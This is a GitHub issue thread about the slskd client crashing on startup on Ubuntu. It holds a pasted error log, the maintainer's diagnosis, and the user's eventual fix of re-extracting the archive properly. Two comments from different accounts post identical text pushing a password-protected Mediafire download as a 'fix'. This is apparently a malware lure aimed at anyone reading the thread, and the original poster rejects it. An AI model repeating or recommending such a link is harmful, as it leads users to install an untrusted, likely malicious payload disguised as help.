### ISSUE TITLE
error when executing slskd binary in slskd-0.21.3-linux-x64.zip

### ISSUE THREAD

**Issue by multirx** [slskd/slskd#1190]
error when executing slskd binary in slskd-0.21.3-linux-x64.zip

running as user in ubuntu 20.04

do I need to compile this ? 

                ▄▄▄▄         ▄▄▄▄       ▄▄▄▄
           ▄▄▄▄▄▄▄ █  █ ▄▄▄▄▄▄▄ █  █▄▄▄ ▄▄▄█  █
           █__ --█ █  █ █__ --█ █    ◄█ █  -  █
           █▄▄▄▄▄█ █▄▄█ █▄▄▄▄▄█ █▄▄█▄▄█ █▄▄▄▄▄█
╒════════════════════════════════════════════════════════╕
│           GNU AFFERO GENERAL PUBLIC LICENSE            │
│                   https://slskd.org                    │
│                                                        │
│              0.21.3.0 (0.21.3.0+ea7cc69e)              │
└────────────────────────────────────────────────────────┘
[03:03:52 INF] Version: 0.21.3.0 (0.21.3.0+ea7cc69e)
[03:03:52 INF] System: .NET 8.0.7, Unix 5.4.0.193, 64 bit, 1 processors
[03:03:52 INF] Process ID: 213168 (64 bit)
[03:03:52 INF] Invocation ID: 68e34ae1-3357-4c24-b9a0-b5f140008d9f
[03:03:52 INF] Instance Name: default
[03:03:52 INF] Configuring application...
[03:03:52 INF] Using application directory /home/benadmin/.local/share/slskd
[03:03:52 INF] Using configuration file /home/benadmin/.local/share/slskd/slskd.yml
[03:03:52 INF] Storing application data in /home/benadmin/.local/share/slskd/data
[03:03:52 FTL] Application terminated unexpectedly
System.IO.FileNotFoundException: Unable to find the specified file.
   at Interop.Sys.GetCwdHelper(Byte* ptr, Int32 bufferSize)
   at Interop.Sys.GetCwd()
   at Microsoft.Extensions.Hosting.HostingHostBuilderExtensions.SetDefaultContentRoot(IConfigurationBuilder hostConfigBuilder)
   at Microsoft.Extensions.Hosting.HostApplicationBuilder..ctor(HostApplicationBuilderSettings settings)
   at Microsoft.AspNetCore.Builder.WebApplicationBuilder..ctor(WebApplicationOptions options, Action`1 configureDefaults)
   at Microsoft.AspNetCore.Builder.WebApplication.CreateBuilder(String[] args)
   at slskd.Program.Main(String[] args)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by multirx** [comment]
ok , not sure what you are offering in this download , but I think not ! 
I realize I just need to uncomment and finish config file , as its lacking default settings for an install

**Comment by jpdillingham** [comment]
It looks like it can't find the `wwroot` directory.  Did you extract the entire contents of the zip file?

Have you changed any settings other than username and password?

**Comment by multirx** [comment]
thanks jpdillingham , I had unzipped and uploaded to my server via windows which probably broke permissions etc.
just used and wget and unzip and its working fine
